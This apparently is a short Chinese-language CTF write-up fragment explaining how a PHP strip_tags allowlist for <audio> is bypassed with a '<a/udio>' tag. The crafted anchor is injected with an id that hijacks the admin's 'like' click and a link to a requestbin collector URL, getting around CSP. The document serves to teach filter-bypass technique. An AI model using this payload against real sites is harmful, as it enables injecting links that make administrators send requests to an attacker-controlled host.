我们输入的东西。管理员会给你点赞
输入如下`1231
就变成了
在源码中。限制了只允许<audio>标签
会把其他标签都过滤掉
echo strip_tags('<script>','<audio>');
但是strip_tags允许/。本意是不过滤</audio>标签。但是没限制/的位置
echo strip_tags('</audio>','<audio>');
我们可以构造
echo strip_tags('<a/udio>','<audio>');
这样解析出来时<a/udio>。
然后放到浏览器上解析。就变成了<a uio>
a标签属性带一个uio
并且存在CSP。不能跨域请求。可以用a标签进行请求
<a/udio id=like href=http://http.requestbin.buuoj.cn/v4c4pyv4>aa
浏览器解析后就成了
<a udio id=like href=http://http.requestbin.buuoj.cn/v4c4pyv4>aa
管理员在进行点赞的时候就会请求页面。